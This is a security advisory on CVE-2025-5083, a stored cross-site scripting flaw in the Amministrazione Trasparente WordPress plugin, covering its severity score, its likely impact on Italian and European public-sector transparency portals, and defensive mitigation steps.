CVE-2025-5083 is a medium-severity stored Cross-Site Scripting (XSS) vulnerability affecting the Amministrazione Trasparente WordPress plugin developed by milmor. This vulnerability exists in all versions up to and including version 9.0. The root cause is improper neutralization of input during web page generation, specifically insufficient input sanitization and output escaping in the plugin's admin settings. The vulnerability allows an authenticated attacker with administrator-level permissions or higher to inject arbitrary malicious scripts into pages. These scripts execute whenever any user accesses the compromised page. Notably, this vulnerability only affects WordPress multi-site installations or installations where the unfiltered_html capability has been disabled, limiting the scope somewhat. The CVSS 3.1 base score is 5.5 (medium), reflecting that the attack vector is network-based, requires high privileges (administrator), no user interaction is needed, and the impact is limited to low confidentiality and integrity loss without availability impact. The vulnerability’s scope is changed (S:C) because the injected scripts can affect other users beyond the attacker. No known exploits are currently reported in the wild, and no patches have been linked yet. The vulnerability is classified under CWE-79, indicating improper neutralization of input leading to XSS. This vulnerability could allow attackers to perform actions such as session hijacking, defacement, or redirecting users to malicious sites, depending on the injected payload. However, exploitation requires administrative access, which limits the risk to environments where such access is compromised or insider threats exist.

For European organizations using WordPress multi-site installations with the Amministrazione Trasparente plugin, this vulnerability poses a risk of persistent XSS attacks that can compromise the confidentiality and integrity of user data. Since the plugin is designed for transparency administration, often used by public sector or governmental entities in Italy and potentially other European countries, the impact could extend to sensitive administrative data or public-facing transparency portals. Attackers with admin access could inject malicious scripts that execute in the browsers of other administrators or users, potentially leading to session hijacking, unauthorized actions, or misinformation dissemination. The requirement for administrator-level privileges reduces the likelihood of external attackers exploiting this vulnerability directly but raises concerns about insider threats or compromised admin accounts. The multi-site limitation means organizations running single-site WordPress instances are not affected, but large organizations or municipalities using multi-site setups are at risk. The vulnerability could undermine trust in public transparency platforms and lead to reputational damage, especially in countries with strict data protection regulations like GDPR. Additionally, the cross-site scripting could be leveraged as a stepping stone for further attacks within the affected network.

1. Immediate mitigation should include restricting administrator access to trusted personnel only and enforcing strong authentication mechanisms such as multi-factor authentication (MFA) to reduce the risk of compromised admin accounts. 2. Organizations should audit their WordPress installations to identify if they use multi-site configurations with the Amministrazione Trasparente plugin and verify if unfiltered_html is disabled. 3. Until an official patch is released, administrators can implement manual input sanitization and output escaping in the plugin’s admin settings if feasible, or disable the plugin temporarily in multi-site environments. 4. Monitor administrative activity logs for suspicious behavior indicative of attempted exploitation or unauthorized script injections. 5. Employ Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts in browsers accessing the affected sites. 6. Regularly update WordPress core and plugins to the latest versions once patches become available. 7. Conduct security awareness training for administrators to recognize and prevent social engineering attacks that could lead to credential compromise. 8. Consider deploying Web Application Firewalls (WAFs) with rules to detect and block XSS payloads targeting the plugin’s admin pages.